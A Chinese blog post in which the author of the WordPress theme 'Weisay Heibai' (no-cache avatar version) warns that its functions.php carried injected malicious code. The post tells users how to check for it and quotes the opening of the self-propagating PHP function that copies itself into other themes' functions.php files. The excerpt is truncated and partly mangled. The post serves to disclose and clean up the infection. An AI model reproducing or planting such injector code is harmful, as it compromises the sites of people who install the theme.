今天朋友说我的主题(『Weisay Heibai』无缓存头像版)中的functions.php被插入了恶意代码,我感到非常的震惊,赶紧下载打开查证,果然发现了恶意代码,现在我已经删掉了此段恶意代码,主题包也已经更新过了,请下载使用过的朋友赶紧删除主题文件夹下面的functions.php,重新下载我新上传主题包中的functions.php。
这段代码会感染主题文件夹下的其他主题,可能会把这段代码复制到其他主题的functions.php下面,所以很抱歉,大家要修正不仅仅是『Weisay Heibai』无缓存头像版,还有你主题文件夹下的其他主题,请使用的朋友特别注意检查下,看有没有问题,我深感抱歉。
WordPress黑白主题『Weisay Heibai』我发布2个版本,『Weisay Heibai』无缓存头像版 是我后来发布的版本,开始使用的人可能不知道,『Weisay Heibai』缓存头像版是没有问题的,只有『Weisay Heibai』无缓存头像版 有问题。
前几天帮人家修改了主题,可能导致这个问题的发生,开始我也不知道竟然还有这个东东,感谢zwwooooo的提醒。
希望用过我主题的朋友,都检查下主题的functions.php,看看其中有没有类似这段,这段恶意代码很长,我截取前面一段。
function _verifyactivate_widgets(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__), . ? ));$output= $allowed= $output=strip_tags($output, $allowed); $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__), themes ) + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget, _ ),stripos(substr($widget,stripos($widget, _ )), ( )); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $comaar=stripos( substr($cont,-20), ? . ) !== false ? : ? . $output .= $before . Not found . $after; if (stripos( substr($cont,-20), ? . ) !== false){$cont=substr($cont,0,strripos($cont, ? . ) + 2);} $output=rtrim($output, \n\t fputs($f=fopen($item, w+ ),$cont . $comaar . \n .$widget);fclose($f); $output .= ($isshowdots $ellipsis) ? ... :
我主题正常的functions.php在
add_filter('the_content', 'password_hint');//全部设置结束?之后就结束了,后面还有其他代码的话就说明有问题了。
希望使用我主题的朋友都检查下,再次深感抱歉,以后我会严格检查我的主题的。